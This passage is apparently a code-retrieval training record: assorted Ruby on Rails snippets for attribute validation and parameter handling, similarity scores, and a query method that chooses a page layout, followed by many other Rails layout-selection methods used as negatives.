"def valid?\n return false if @pricing_component_type.nil?\n pricing_component_type_validator = EnumAttributeValidator.new('String', [\"setup\", \"subscription\", \"arrears\", \"usage\"])\n return false unless pricing_component_type_validator.valid?(@pricing_component_type)\n return false if @charge_type.nil?\n charge_type_validator = EnumAttributeValidator.new('String', [\"Credit\", \"Debit\"])\n return false unless charge_type_validator.valid?(@charge_type)\n return false if @period_start.nil?\n return false if @period_end.nil?\n return false if @invoice_id.nil?\n return false if @organization_id.nil?\n return false if @name.nil?\n return false if @description.nil?\n return false if @calculation.nil?\n return false if @cost.nil?\n return false if @tax.nil?\n return false if @component_value.nil?\n return false if @pricing_component_id.nil?\n return false if @public_pricing_component_name.nil?\n return false if @pricing_component_name.nil?\n return false if @subscription_charge_id.nil?\n return false if @child_invoice_id.nil?\n return false if @type.nil?\n type_validator = EnumAttributeValidator.new('String', [\"PricingComponent\", \"Coupon\", \"Migration\", \"AggregatedInvoice\"])\n return false unless type_validator.valid?(@type)\n return true\n end",
"def valid_record?( record )\n !record[:name].nil? and !record[:type].nil? and !record[:value].nil? and\n !record[:name].empty? and !record[:type].empty? and !record[:value].empty?\nend",
"def prepare_myabsence\n unless params[:date].blank? || params[:date] == \"undefined\"\n @date = Date.parse(params[:date])\n else\n @date = Date.today\n end\n yesterday_presence = @current_person.presences.find_by_presence_date(@date.yesterday)\n my_last_presence = @current_person.presences.find(:first, :order => \"presence_date DESC\")\n if my_last_presence\n @my_last_presence_date = my_last_presence.presence_date\n else\n @my_last_presence_date = Date.yesterday\n end\n @my_presence = @current_person.presences.find_by_presence_date(@date)\n @yesterday_schedule = @current_person.current_schedule(Date.yesterday).blank? ? Date.yesterday.to_time : @current_person.current_schedule(Date.yesterday)[:schedule_end]\n if @my_presence\n @my_presence_details = @my_presence.presence_details(:order => :start_working)\n end\n end",
"def workUnitsAttributesAnalysis(entities,tr_uuid,wu_key)\n\t\t@wu_attr_result={:uuid => tr_uuid, :wukey => wu_key, :attrs => [], :success_count => 0, :failed_count => 0 }\n\t\tparams=prepare_base_params()\t\n\t\t@workunitattr_restapi=\"#{@optier_base_url}/eTransactionInstance/#{tr_uuid}/wu/#{wu_key}?tf=#{@time_frame}&#{@order_filters}\"\t\t\n\t\tresult=server_rest_api(@workunitattr_restapi,params)\t\t\n\t\n\n\t\t@found_attr=false\t\n\t\tentities.each do |entity|\t\t\t\t\t\t\t\n\t\t\tattrtype={:attrType => entity[:attrType], :attrs => [],:status => nil, :success_count => 0, :failed_count => 0}\t\t\t\t\n\t\t\tattributes=[]\t\t\t\n\t\t\tresult[:attributes].each do |res|\t\t\t\t\t\t\n\t\t\t\t@found_attr=false\t\t\t\t\t\n\t\t\t\tif ! res[0][entity[:attrType]].nil?\n\t\t\t\t\tentity[:attrs].each do |k,v|\n \t\t\t\tif ( ( res[1].has_key?(k)) && (( v == \"key_only\") || (res[1][k].eql?(v) ) )) \t\t\t\n\t\t\t\t\t\t\tattrtype[:status]=true\n\t\t\t\t\t\t\tattrtype[:success_count]+=1\t\t\t\t\t\t\n\t\t\t\t\t\t\t@found_attr=true\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tactual=(v.eql?(\"key_only\")) ? \"found\" : res[1][k]\t\t\t\t\t\t\t\t\n\t\t\t\t\t\telse\t\t\t\n\t\t\t\t\t\t\t@found_attr=false\t\t\t\t\t\t\n\t\t\t\t\t\t\tattrtype[:failed_count]+=1\n\t\t\t\t\t\t\tattrtype[:status]=false\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tactual=(v.eql?(\"key_only\")) ? \"not_found\" : res[1][k]\t\t\t\t\t\t\t\n\t\t\t\t\t\tend\t\t\t\t\n\t\t\t\t\t\tattrtype[:attrs].push({:param=> k, :expected_value=> v, :actual_value=> actual})\t\t\t\t\t\t\n\t\t\t\t\tend\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t@wu_attr_result[:attrs].push(attrtype)\n\t\t\t\tend\n\t\t\tend unless result[:attributes].nil?\n\t\t\t@wu_attr_result[:status]=attrtype[:status]\n\t\t\t@wu_attr_result[:success_count]+=attrtype[:success_count]\n\t\t\t@wu_attr_result[:failed_count]+=attrtype[:failed_count]\n\t\t\tbreak if @found_attr\t\n\t\tend\n\t\treturn @wu_attr_result\n\tend",
"def valid_attributes\n %w[\n amount\n authorisationId\n automaticResponseUrl\n captureDay\n captureMode\n complementaryCode\n complementaryInfo\n currencyCode\n customerLanguage\n expirationdate\n keyVersion\n maskedPan\n merchantId\n normalReturnUrl\n orderId\n paymentMeanBrand\n paymentMeanBrandList\n paymentMeanType\n responseCode\n transactionDateTime\n transactionReference\n ]\n end",
"def details_complete?\n name.valid? &&\n date_of_birth.present? &&\n date_of_applicability.present? &&\n addresses.any?(&:valid?)\n end",
"def fully_specified\r\n !address.nil? && !address.empty? &&\r\n !city.nil? && !city.empty? &&\r\n !state.nil? && !state.empty? &&\r\n !zip.nil? && !zip.empty?\r\n end",
"def valid?\n return false if @first_name.nil?\n return false if @first_name.to_s.length > 30\n return false if !@last_name.nil? && @last_name.to_s.length > 30\n return false if !@address_line1.nil? && @address_line1.to_s.length > 50\n return false if !@address_line2.nil? && @address_line2.to_s.length > 50\n return false if !@city.nil? && @city.to_s.length > 50\n return false if !@state.nil? && @state.to_s.length > 50\n return false if !@zip.nil? && @zip.to_s.length > 12\n return false if !@country.nil? && @country.to_s.length > 50\n return false if !@security_identifier.nil? && @security_identifier.to_s.length > 184\n return false if !@title.nil? && @title.to_s.length > 100\n return false if !@school.nil? && @school.to_s.length > 50\n return false if !@nick_name.nil? && @nick_name.to_s.length > 30\n return false if !@significant_other.nil? && @significant_other.to_s.length > 30\n return false if !@portal_password.nil? && @portal_password.to_s.length > 15\n return false if !@portal_security_level.nil? && @portal_security_level > 6.0\n return false if !@portal_security_level.nil? && @portal_security_level < 1.0\n gender_validator = EnumAttributeValidator.new('String', [\"Male\", \"Female\"])\n return false unless gender_validator.valid?(@gender)\n presence_validator = EnumAttributeValidator.new('String', [\"Online\", \"DoNotDisturb\", \"Away\", \"Offline\", \"NoAgent\"])\n return false unless presence_validator.valid?(@presence)\n return true\n end",
"def set_default_values\n self.is_paid = false\n self.is_served = false\n self.is_preparation_started = false\n self.is_preparation_done = false\n return true\n end",
"def compute_criteria_to_check\n if params[:hour]\n hours = [params[:hour]]\n require_all = true\n else\n hours = (0...24).to_a\n require_all = channel.update_frequency == DataProviderChannel::UPDATES_HOURLY\n end\n options_list = hours.map do |hour|\n prefix = basename_prefix(\n :channel_name => channel.name,\n :date => params[:date], :hour => hour\n )\n {:date => params[:date], :hour => hour, :prefix => prefix}\n end\n [options_list, require_all]\n end",
"def assumption_params\n attribute_for_all = [:name, :description, :type,]\n array_for_all = {required_by_ids: [], model_ids: []}\n res = if (params[:query_assumption])\n params.require(:query_assumption).permit(attribute_for_all, :question, :argument_inverted, array_for_all)\n elsif (params[:blank_assumption])\n params.require(:blank_assumption).permit(attribute_for_all, :argument_inverted, array_for_all, assumption_ids: [])\n elsif (params[:test_assumption])\n params.require(:test_assumption).permit(attribute_for_all, :r_code, :argument_inverted, array_for_all, required_dataset_fields: [])\n elsif (params[:query_test_assumption])\n params.require(:query_test_assumption).permit(attribute_for_all, :r_code, :argument_inverted, :question, :argument_inverted, array_for_all, required_dataset_fields: [])\n else\n {}\n end\n res[:user] = current_user\n res\n end",
"def custom_validations\n self.validate_baseline && validate_baseline_date && \n self.validate_trial_days && self.validates_goal_name && self.validation_due_date\n end",
"def attributes_exist?\n\tend",
"def get_mandatory\n @mandatory\n end",
"def validate_params\n validate_size\n validate_mine_density\n validate_first_click\n type_specific_checks\n end",
"def validate_required_values\n # Make sure all MUST attributes have a value\n @object_classes.each do |object_class|\n object_class.must.each do |required_attribute|\n # Normalize to ensure we catch schema problems\n # needed?\n real_name = to_real_attribute_name(required_attribute.name, true)\n raise UnknownAttribute.new(required_attribute) if real_name.nil?\n # # Set default if it wasn't yet set.\n # @data[real_name] ||= [] # need?\n value = @data[real_name] || []\n # Check for missing requirements.\n if value.empty?\n _schema = schema\n aliases = required_attribute.aliases.collect do |name|\n self.class.human_attribute_name(name)\n end\n args = [self.class.human_object_class_name(object_class)]\n if ActiveLdap.const_defined?(:GetTextFallback)\n if aliases.empty?\n format = \"is required attribute by objectClass '%s'\"\n else\n format = \"is required attribute by objectClass '%s'\" \\\n \": aliases: %s\"\n args << aliases.join(', ')\n end\n else\n if aliases.empty?\n format = _(\"%{fn} is required attribute by objectClass '%s'\")\n else\n format = _(\"%{fn} is required attribute by objectClass \" \\\n \"'%s': aliases: %s\")\n args << aliases.join(', ')\n end\n end\n errors.add(real_name, format % args)\n end\n end\n end\n end",
"def time_params\n if params[:twelve].present? && params[:twelve][:start_time].present? && params[:twelve][:end_time].present?\n #@start_time = Date.new(\"#{params[\"start_time(1i)\"]}\".to_i,\"#{params[\"start_time(2i)\"]}\".to_i,\"#{params[\"start_time(3i)\"]}\".to_i)\n #@end_time = Date.new(\"#{params[\"end_time(1i)\"]}\".to_i,\"#{params[\"end_time(2i)\"]}\".to_i,\"#{params[\"end_time(3i)\"]}\".to_i)\n #params.require(:twelve).permit(:start_time, :end_time)\n @start_time = params[:twelve][:start_time].to_date\n @end_time = params[:twelve][:end_time].to_date\n else\n @start_time = Date.new(Time.now.year,1,1)\n @end_time = Date.new(Time.now.year,12,31)\n flash[:notice] = \"Deverão ser preenchidas as datas de início e fim.\"\n end\n end",
"def valid?\n return false if @class_id.nil?\n class_id_validator = EnumAttributeValidator.new('String', [\"cond.HclStatusDetail\"])\n return false unless class_id_validator.valid?(@class_id)\n return false if @object_type.nil?\n object_type_validator = EnumAttributeValidator.new('String', [\"cond.HclStatusDetail\"])\n return false unless object_type_validator.valid?(@object_type)\n hardware_status_validator = EnumAttributeValidator.new('String', [\"Missing-Os-Driver-Info\", \"Incompatible-Server-With-Component\", \"Incompatible-Processor\", \"Incompatible-Os-Info\", \"Incompatible-Component-Model\", \"Incompatible-Firmware\", \"Incompatible-Driver\", \"Incompatible-Firmware-Driver\", \"Service-Unavailable\", \"Service-Error\", \"Unrecognized-Protocol\", \"Not-Evaluated\", \"Compatible\"])\n return false unless hardware_status_validator.valid?(@hardware_status)\n reason_validator = EnumAttributeValidator.new('String', [\"Missing-Os-Driver-Info\", \"Incompatible-Server-With-Component\", \"Incompatible-Processor\", \"Incompatible-Os-Info\", \"Incompatible-Component-Model\", \"Incompatible-Firmware\", \"Incompatible-Driver\", \"Incompatible-Firmware-Driver\", \"Service-Unavailable\", \"Service-Error\", \"Unrecognized-Protocol\", \"Not-Evaluated\", \"Compatible\"])\n return false unless reason_validator.valid?(@reason)\n software_status_validator = EnumAttributeValidator.new('String', [\"Missing-Os-Driver-Info\", \"Incompatible-Server-With-Component\", \"Incompatible-Processor\", \"Incompatible-Os-Info\", \"Incompatible-Component-Model\", \"Incompatible-Firmware\", \"Incompatible-Driver\", \"Incompatible-Firmware-Driver\", \"Service-Unavailable\", \"Service-Error\", \"Unrecognized-Protocol\", \"Not-Evaluated\", \"Compatible\"])\n return false unless software_status_validator.valid?(@software_status)\n status_validator = EnumAttributeValidator.new('String', [\"Incomplete\", \"Not-Found\", \"Not-Listed\", \"Validated\", \"Not-Evaluated\"])\n return false unless status_validator.valid?(@status)\n true && super\n end",
"def process_date_params\n \n puts \"processing data params\"\n \n # Checks start and end dates. Likewise if there is an error the default\n # is to send the entire timeseries\n begin\n puts \"date time found\"\n params[:start_date] = DateTime.parse(params[:start_date]) unless params[:start_date].nil?\n params[:end_date] = DateTime.parse(params[:end_date]) unless params[:end_date].nil?\n params[:start_date] = Interaction.order('count_date asc').first.count_date if params[:start_date].nil?\n params[:end_date] = DateTime.now if params[:end_date].nil?\n rescue\n puts \"no date_time found\"\n params[:start_date] = Interaction.order('count_date asc').first.count_date\n params[:end_date] = DateTime.now\n end\n end",
"def validate_start_and_stop_date\n if active_date\n if active_start_date.nil? or active_stop_date.nil?\n errors.add(:active_date, \"start date or end date not set\")\n end\n end\n end",
"def valid?\n return false if @created_time.nil?\n return false if @last_modified_time.nil?\n return false if @token.nil?\n return false if @user_token.nil?\n return false if @card_product_token.nil?\n return false if @last_four.nil?\n return false if @pan.nil?\n return false if @expiration.nil?\n return false if @expiration_time.nil?\n return false if @barcode.nil?\n return false if @pin_is_set.nil?\n return false if @state.nil?\n state_validator = EnumAttributeValidator.new('String', [\"ACTIVE\", \"SUSPENDED\", \"TERMINATED\", \"UNSUPPORTED\", \"UNACTIVATED\"])\n return false unless state_validator.valid?(@state)\n return false if @state_reason.nil?\n return false if @fulfillment_status.nil?\n fulfillment_status_validator = EnumAttributeValidator.new('String', [\"ISSUED\", \"ORDERED\", \"REORDERED\", \"REJECTED\", \"SHIPPED\", \"DELIVERED\", \"DIGITALLY_PRESENTED\"])\n return false unless fulfillment_status_validator.valid?(@fulfillment_status)\n instrument_type_validator = EnumAttributeValidator.new('String', [\"PHYSICAL_MSR\", \"PHYSICAL_ICC\", \"PHYSICAL_CONTACTLESS\", \"PHYSICAL_COMBO\", \"VIRTUAL_PAN\"])\n return false unless instrument_type_validator.valid?(@instrument_type)\n true\n end",
"def valid_attributes\n {\n :executed => 1.day.ago,\n :sequence_source_id => sequence_source.id,\n }\n end",
"def validate_can_assign_auction_date\n if self.ready_for_auction? && \n (self.auction_datum.blank? || (self.auction_datum.present? && self.auction_datum.auction_date.blank? )) &&\n self.service_orders.joins(:service_order_details).where(\"service_order_details.status=? AND service_orders.priority=?\", ServiceOrder::SO_STATUS_APPROVED, ServiceOrder::SO_PRIORITY_HIGH).count > 0\n self.errors.add(:\"auction_datum.auction_date\", I18n.t(\"models.vehicle.errors.service_order_must_be_completed\"))\n end\n end",
"def required_fields\n # \"cid\" is not required\n [\n \"byr\",\n \"ecl\",\n \"eyr\",\n \"hcl\",\n \"hgt\",\n \"iyr\",\n \"pid\",\n ]\nend",
"def validate_contract_data?\n initial_call_off_period.present? ? initial_call_off_period.positive? : false\n end",
"def validate_contract_data?\n initial_call_off_period.present? ? initial_call_off_period.positive? : false\n end"
] | [
"0.6687193",
"0.6550766",
"0.6403036",
"0.6324402",
"0.63084084",
"0.6258411",
"0.6142323",
"0.6122722",
"0.6114756",
"0.6105565",
"0.6075499",
"0.60739017",
"0.60556495",
"0.6054276",
"0.6021295",
"0.60072136",
"0.59912485",
"0.5980923",
"0.597026",
"0.5969717",
"0.59487826",
"0.59352463",
"0.59222066",
"0.5915313",
"0.59116805",
"0.5903267",
"0.5898966",
"0.5893766",
"0.5887096",
"0.5877553",
"0.5862483",
"0.58567303",
"0.5841634",
"0.58361727",
"0.5818827",
"0.58126265",
"0.57922894",
"0.57799566",
"0.57623786",
"0.5755367",
"0.5753662",
"0.5752486",
"0.5728392",
"0.57277364",
"0.5713894",
"0.57098657",
"0.5705771",
"0.5693951",
"0.56847453",
"0.56843936",
"0.568321",
"0.56825405",
"0.5677659",
"0.56772023",
"0.5676393",
"0.566792",
"0.56605077",
"0.5658097",
"0.5657788",
"0.56495744",
"0.56462765",
"0.5645689",
"0.5645263",
"0.5641974",
"0.5640205",
"0.5639353",
"0.56360584",
"0.5635598",
"0.5634544",
"0.5633653",
"0.5630466",
"0.56281394",
"0.5614547",
"0.56137496",
"0.56008095",
"0.559009",
"0.55893874",
"0.5586347",
"0.5584432",
"0.55738974",
"0.5571048",
"0.55648553",
"0.55600977",
"0.55568683",
"0.555395",
"0.55496275",
"0.55449086",
"0.55375934",
"0.5536502",
"0.5530118",
"0.5528279",
"0.5525432",
"0.5525124",
"0.5521982",
"0.55213076",
"0.5520739",
"0.55168897",
"0.5514062",
"0.5512534",
"0.5509966",
"0.5509966"
] | 0.0 | -1 |
application controller will attempt to determine layout based on params or current page unless it is specified on the subclass | def determine_layout
return @__layout if @__layout
return false if params[:_no_layout] || request.xhr?
@__layout ||= current_page.layout.try(:template) if current_page.present?
@__layout ||= 'application/default'
@__layout
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def layout_for_page\n if params[:layout] == 'none' || params[:layout] == 'false'\n false\n else\n params[:layout] || 'application'\n end\n end",
"def determine_layout\n ['show'].include?(action_name) ? 'application' : nil \n end",
"def layout\n self.class.layout || @app.layout\n end",
"def get_layout_from_params\n params[:layout] ? params[:layout] : 'application' \n end",
"def choose_layout \n if [ 'index', 'new', 'create','zones' ].include? action_name\n 'application'\n else\n 'application'\n end\n end",
"def set_stall_layout\n return false if request.xhr?\n return Stall.config.default_layout if Stall.config.default_layout\n\n parent_controller = self.class.ancestors.find do |ancestor|\n !ancestor.name.to_s.match(/^Stall::/) && Class === ancestor\n end\n\n parent_controller._layout ||= 'application'\n end",
"def default_layout_for_request\n return params[:__layout] if params[:__layout]\n return params[:layout] if params[:layout]\n 'application'\n end",
"def set_layout\n params[:action] == 'index' ? 'admin' : (params[:layout] || 'realestate')\n end",
"def set_layout\n if request.xhr?\n self.class.layout false\n else\n self.class.layout \"application\"\n end\n end",
"def choose_layout\r\n return nil if action_name=='show'\r\n return 'usercenter' if action_name=='index' || action_name=='new'\r\n return 'public'\r\n end",
"def dynamic_layout\n # ALL THIS SUCKS, I KNOW..\n \n # No layout for AJAX calls\n @layout = if request.xhr? \n nil\n # dialog param = lightview popup\n elsif params[:dialog]\n 'dialog'\n # uses user 'role' name for layout ... bad\n elsif current_user && !current_user.role.nil?\n current_user.role.downcase\n # no user, check for 'about' action\n elsif controller_name == 'about'\n 'about'\n # none of the above, use Rails default\n else\n 'home'\n end\n return nil unless @layout\n \n Rails.logger.debug \"Dyamic layout = #{@layout}\"\n # Layouts further divided by site subdomain: www vs vault\n if current_subdomain == 'vault'\n # Then public vs logged in...ugh\n if current_user\n @layout = 'vault/private/' + @layout\n else\n @layout = 'vault/public/' + @layout\n end\n end\n @layout\n end",
"def current_layout\n controller.send :_layout # private method\n end",
"def set_layout\n if 1==1\n 'application'\n else\n 'dean'\n end\n end",
"def layouts; end",
"def layouts; end",
"def layout_by_resource\n if request.original_url.include? \"/wechat_service/\" \n 'wechat_service_application'\n else\n if devise_controller?\n 'devise'\n else\n 'application'\n # case action_name \n # when 'index' then 'list'\n # when 'show', 'new', 'edit', 'update', 'create' then 'form'\n # else 'application' end if controller_name != 'home'\n end\n end \n\n end",
"def set_layout\n if %w( print plain ).include? params[:layout]\n params[:layout]\n else\n 'default'\n end\n end",
"def layout; end",
"def layout\n case @mode\n when :injector\n \"injector\"\n when :page\n \"application\"\n else\n false\n end\n end",
"def layout\n @layout\n end",
"def page_layout\n if @page\n if params[:popup]\n \"modal\"\n elsif !@page.layout.blank?\n @page.layout\n else\n choose_layout\n end\n else\n params[:popup] ? 'modal' : choose_layout\n end\n end",
"def determine_layout\n case action_name\n when \"new\"\n \"hero\"\n when \"create\"\n \"hero\"\n when \"edit\"\n \"dashboard\"\n when \"update\"\n \"dashboard\"\n end\n end",
"def get_layout\n\tlogged_in? and :page_user or :page_visitor\nend",
"def layout\n lookup_layout\n end",
"def default_layout\n site.config.page_layout\n end",
"def action_has_layout?; end",
"def layout\n nil\n end",
"def layout\n nil\n end",
"def determine_layout\n request.xhr? ? 'ajax' : common_layout\n end",
"def layout\n # only turn it off for login pages:\n # is_a?(Devise::SessionsController) ? \"sign_in_up\" : \"application\"\n # or turn layout off for every devise controller:\n #devise_controller? && \"application\"\n @categories ||= Category.ordered.with_memories \n\n if devise_controller? && params[:controller] == \"sessions\" || params[:controller] == \"registrations\" && params[:action] == \"new\" || \n params[:controller] == \"registrations\" && params[:action] == \"create\" || params[:controller] == \"passwords\" && params[:action] == \"new\" ||\n params[:controller] == \"confirmations\" && params[:action] == \"show\" \n \"sign_in_up\"\n else\n \"application\"\n end\n \n \n end",
"def page_layout\n @user = User.current\n @blocks = @user.pref.my_page_layout\n end",
"def layout \n return @layout\n end",
"def layout_type\n if params[:controller] == \"catalog\"\n if params[:action] == \"show\" || params[:action] == \"downloads\"\n \"item\"\n elsif params[:action] == \"index\"\n \"index\"\n end\n else\n \"default\"\n end\n end",
"def books_layout\n if params[:action] == 'show'\n 'reading'\n elsif params[:action] == 'edit' || params[:action] == 'new'\n 'writing'\n else\n 'application'\n end\n end",
"def set_layout\n\t \treturn \"landing\" if action_name == \"unregistered\"\n\t \tsuper\n\t end",
"def determine_layout\n request.xhr? ? 'ajax' : 'application'\n end",
"def default_layout_for_request\n layout =\n case\n when params[:_layout] || params[:layout]\n l = params[:_layout] || params[:layout]\n l == 'false' ? false : l\n when request.xhr? || params[:xhr]\n false\n else\n default_layout\n end\n end",
"def layout(layout_type)\n\t\t#most content. that is loaded into the artist content area (just content)\n\t\tif layout_type.nil? || layout_type.blank?\n\t\t\t@layout = false\n\t\t\t@hook = \"#content\"\n\t\t#when artist page has to be loaded (logo, nave and content)\n\t\telsif layout_type == \"artist\"\n\t\t\t@layout = \"layouts/artist_admin_and_artist_floating_content.html.erb\"\n\t\t\t@hook = \".dynamicContent\"\n\t\tend\n\tend",
"def layout_container_class\n if params[:controller] == \"events\" && params[:action] == \"show\"\n \"event container\"\n else\n \"container\"\n end\n end",
"def show\n @layout_details = {\n controller: params[:controller],\n action: params[:action],\n styles: [],\n other_styles: [\"scaffolds\"],\n scripts: [],\n other_scripts: [\"scaffolds\"]\n }\n\tend",
"def resolve_layout\n\t case action_name\n\t when 'index'\n\t \t'blank'\n\t else\n\t 'application'\n\t end\n\t end",
"def set_layout\n if current_paciente != nil\n \"pacientes_pages\"\n else\n \"nutriologo_pages\"\n end\n end",
"def layout\n @layout ||= layout_class.new(@rack_context)\n end",
"def render_page_layout\n render @page, page: @page\n rescue ActionView::MissingTemplate\n warning(\"PageLayout: '#{@page.page_layout}' not found. Rendering standard page_layout.\")\n render \"alchemy/page_layouts/standard\", page: @page\n end",
"def site_layout\n if params[:action].to_s.in?(gift_actions)\n \"gift_application\"\n else\n \"application\"\n end\n end",
"def layout layout = nil, *actions\n if (layout || layout == false) && configurable?\n @layouts ||= Hash.new\n layout = layout.to_s unless layout == false\n if actions.size == 0\n actions = ['*']\n @master_layout = layout\n end\n actions.each { |a| @layouts[a] = layout }\n end\n @setup[:layouts] ||= @layouts ||\n (@controller.ctrl.slice.view.layout if @controller) || {}\n end",
"def configure\n # fetching page via before filter\n if @page.redirects_to_external?\n render action: 'configure_external', layout: !request.xhr?\n else\n @page_layouts = PageLayout.layouts_with_own_for_select(@page.page_layout, session[:language_id], @page.layoutpage?)\n render layout: !request.xhr?\n end\n end",
"def layout_name\n controller = @tracker.controllers[@current_class]\n\n return controller[:layout] if controller[:layout]\n return false if controller[:layout] == false\n\n app_controller = @tracker.controllers[:ApplicationController]\n\n return app_controller[:layout] if app_controller and app_controller[:layout]\n\n nil\n end",
"def resolve_layout\n case action_name\n when 'index'\n 'dashboard'\n else\n 'application'\n end\n end",
"def default_layout\n 'default' if html?\n end",
"def set_layout\n request.xhr? ? 'empty' : 'application'\n end",
"def determine_layout\n 'akinu'\n end",
"def layout\n @current_layout ||= :default_layout\n send(\"#{@current_layout}\"){ yield }\n end",
"def custom_layout\n case action_name\n when \"edit\"\n \"profile\"\n when \"dashboard\"\n \"profile\"\n when \"show\"\n \"profile\"\n when \"change_password\"\n \"profile\"\n when \"admin_user\"\n \"profile\"\n when \"adminuser_logs\"\n \"profile\"\n when \"add_adminuser\"\n \"profile\"\n when \"add\"\n \"profile\"\n when \"upload\"\n \"profile\"\n when \"product_manager_logs\"\n \"profile\"\n when \"show\"\n \"profile\"\n when \"suspend\"\n \"profile\" \n else\n \"application\"\n end\n end",
"def layout_for\n if devise_controller?\n 'full_page'\n else\n 'application'\n end\n end",
"def master_layout\n @setup[:master_layout] ||= @master_layout ||\n (@controller.ctrl.slice.view.master_layout if @controller)\n end",
"def layout\n if request.xhr?\n return false\n else\n return 'application'\n end\n end",
"def layout\n return false unless layouts = controller.ancestral_trait[:layout]\n\n possible = [layouts[path], layouts[:all]].compact\n denied = layouts[:deny].to_a\n\n if layout = possible.first\n if layout.to_s !~ /\\A\\// # late bind layout action to current controller\n layout = R(controller, layout)\n end\n layout_action = Controller.resolve(layout)\n\n return false if denied.any?{|deny| deny === path} or layout_action.path == path\n\n if layout_action.controller != controller\n instance.instance_variables.each do |x|\n if layout_action.instance.instance_variable_defined?(x)\n Log.warn \"overwriting instance variable #{x} from layout controller with instance variable from action controller.\"\n end\n layout_action.instance.instance_variable_set(x, instance.instance_variable_get(x))\n end\n else\n layout_action.binding = binding\n layout_action.controller = controller\n layout_action.instance = instance\n end\n\n layout_action.path = nil\n layout_action\n end\n end",
"def set_page_layout\n @page_layout = PageLayout.find(params[:id])\n end",
"def app_layout\n layout_content = read_view :application, :folder => 'layouts' #, :type => :erb\n\n [:alert, :notice].each{|name| insert_flash_displayer name}\n end",
"def get_page_layout(params)\n if params[:layout] == 'comatose_content'\n File.join(plugin_layout_path, params[:layout])\n else\n params[:layout]\n end\n end",
"def app_layout\n layout_content = read_view :layouts => :application \n [:alert, :notice].each{|name| insert_flash_displayer name, layout_content}\n end",
"def define_layout\n if user_signed_in?\n if current_user.student?\n case params['action']\n when \"show\"\n 'information_student' \n when \"events\"\n 'information_student'\n when \"frequency\"\n 'information_student' \n else\n 'student' \n end\n else\n if params['action'] == 'declaration_of_studying'\n 'print'\n else\n if params['action'] == 'daily'\n 'print'\n else\n if params['action'] == 'down_average'\n 'print'\n else\n if params['action'] == 'print'\n 'print'\n else\n if params['action'] == 'report_calendar'\n 'print'\n else\n if params['action'] == 'report_re_enrollments'\n 'print'\n else\n if params['action'] == 'report_schedules'\n 'print' \n else\n if params['action'] == 'report'\n 'print_not_head'\n else\n if params['action'] == 'report_teacher'\n 'print_not_head' \n else\n if params['action'] == 'buy_books'\n 'print_not_head'\n else\n if params['action'] == \"envelopes_for_exams\"\n 'print_not_head' \n else\n if params['controller'] == 'warnings' and params['action'] == 'show'\n 'print' \n else\n if params['controller'] == 'calendars' and params['action'] == 'show'\n nil \n else\n if params['controller'] == 'companies' and params['action'] == 'print_informations'\n 'print_head_javascript'\n else\n \n if params['controller'] == 'companies' and params['action'] == 'students_for_neighborhood'\n \"print\"\n else\n if params['controller'] == 'companies' and params['action'] == 'lists'\n \"print\"\n else\n if params['controller'] == 'companies' and params['action'] == 'students_for_level'\n \"print\"\n else\n nil \n end\n end \n end\n end\n end\n end\n end \n end\n end\n end\n end\n end\n end\n end\n end\n end\n \n end\n end\n else\n \"login\"\n end\n end",
"def getlayout\n \n \tif request.xhr?\n \t\tfalse\n \telse\n \t\t'application'\n \tend\n end",
"def determine_layout\n current_user ? 'logged_in' : 'not_logged_in'\n end",
"def layout\n if request.xhr?\n return false\n else\n return 'application'\n end\n end",
"def layout_by_resource\n\t\tif devise_controller?\n\t\t\t\"dashboard\"\n\t\telse\n\t\t\t\"application\"\n\t\tend\n\tend",
"def choose_layout\n Rails.configuration.blog.layout\n end",
"def get_page_layout\n if params[:layout] == 'comatose_content'\n File.join(plugin_layout_path, params[:layout])\n else\n params[:layout]\n end\n end",
"def _conditional_layout?; end",
"def set_layout\n if devise_controller? #&& resource_class == Admin\n if params[:controller] == 'devise/registrations' and params[:action] == 'edit'\n \"application\"\n else\n \"devise_layout\"\n end\n end\n end",
"def current_layout\n @site_layout ||= SiteLayout.first\n end",
"def choose_layout\n logger.info \"\\n HOST #{request.host}\\n\"\n if current_user.present?\n if current_user.role?(:admin)\n 'backend_admin'\n else\n 'backend'\n end\n else\n 'application'\n end\n end",
"def controller_layout\n layout = self.send(:_layout)\n if layout.instance_of? String\n layout\n else\n File.basename(layout.identifier).split('.').first\n end\n end",
"def place_in_layout?; end",
"def place_in_layout?; end",
"def show\n @page_layout = PageLayout.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @page_layout }\n end\n end",
"def layout_by_resource\n if devise_controller?\n \"landing\"\n else\n \"application\"\n end\n end",
"def custom_layout\n case action_name\n when \"industry_xls\"\n \"no_layout\"\n when \"supplier_profiles\"\n \"no_layout\"\n when \"total_xls\"\n \t \"no_layout\"\n when \"industry_level\"\n \"no_layout\"\n when \"supplier_level\"\n \"no_layout\"\n when \"company_xls\"\n \t\"no_layout\"\n when \"customer_record\"\n \t\"no_layout\"\n when \"most_company_xls\"\n \t\"no_layout\"\n when \"conversion_industry\"\n \t\"no_layout\"\n when \"conversion_company\"\n \t\"no_layout\"\n when \"company_xls\"\n \t\"no_layout\"\t\n when \"suppliers_profiles\"\n \t\"no_layout\"\n when \"registered_suppliers\"\n \t\"no_layout\"\n when \"unregistered_suppliers\"\n \t\"no_layout\"\n when \"all_customers\"\n \t\"no_layout\"\n when \"jagent\"\n \t\"no_layout\"\n when \"sagent\"\n \t\"no_layout\"\n when \"poll\"\n \"no_layout\"\t\n when \"industry_conversion\"\n \"no_layout\"\t\n when \"company_conversion\"\t\t\n \"no_layout\"\n when \"reviews_processed\"\n \"no_layout\"\n when \"agent_output\"\n \"no_layout\"\n when \"agent_performance\"\n \"no_layout\"\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n else\n \"admin\"\n end\n end",
"def layout\n \"application\"\n end",
"def layout(method = nil)\n @layout = method || @layout\n end",
"def set_layout\n response_code == 200 ? :\"layouts/application.#{@response.output_format}\" : nil\n end",
"def set_layout_flag\n @is_home_page = true\n end",
"def resolve_layout\n case action_name\n when \"create\", \"new\", \"index\"\n \"useraccount_layout\"\n else\n \"application\"\n end\n end",
